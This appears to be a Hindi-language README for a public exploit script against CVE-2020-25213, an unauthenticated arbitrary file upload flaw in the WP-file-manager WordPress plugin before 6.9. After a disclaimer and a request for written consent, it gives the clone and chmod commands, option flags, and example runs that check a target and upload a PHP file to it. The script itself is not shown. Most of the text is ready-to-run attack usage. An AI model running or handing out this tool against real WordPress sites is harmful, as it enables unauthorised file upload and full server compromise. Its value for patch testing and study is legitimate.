
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
WP-file-manager वर्डप्रेस प्लगइन (<6.9) अप्रमाणित मनमानी फ़ाइल अपलोड के लिए संवेदनशील है जिसके परिणामस्वरूप सिस्टम का पूर्ण समझौता होता है।
अधिक जानकारी के लिए मेरे लेख को देखें जो यहाँ प्रकाशित है।
मैंने यह कमजोरी खोजी नहीं है और न ही इस CVE का कोई श्रेय ले रहा हूँ। मैंने केवल विभिन्न ब्लॉगों जैसे wordfence, seravo पर उपलब्ध विवरण का विश्लेषण करने के बाद शोषण बनाया है, इस आदर्श वाक्य के साथ कि पाठक समझें कि कमजोरी के विवरण का विश्लेषण करके POC कैसे बनाया जाए।
मैं इस शोषण का उपयोग करके किसी संगठन को हुए किसी भी नुकसान के लिए जिम्मेदार नहीं हूँ और मैं पाठकों को सलाह दूंगा कि वे संगठन से लिखित सहमति के बिना इस कमजोरी का शोषण न करें क्योंकि यह संगठन को अन्य हैकर्स के हमलों के लिए खुला छोड़ सकता है।
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url वर्डप्रेस लक्ष्य url
-f|--upload_file लक्ष्य पर अपलोड करने के लिए स्थानीय फ़ाइल का पूर्ण पथ।
-k|--check केवल जाँचता है कि कमजोर एंडपॉइंट मौजूद है और उसका विशेष फिंगरप्रिंट है या नहीं। कोई फ़ाइल अपलोड नहीं की जाती।
-v|--verbose निष्पादित होने वाले curl कमांड को भी प्रिंट करता है
-h|--help सहायता मेनू प्रिंट करें
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check ./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
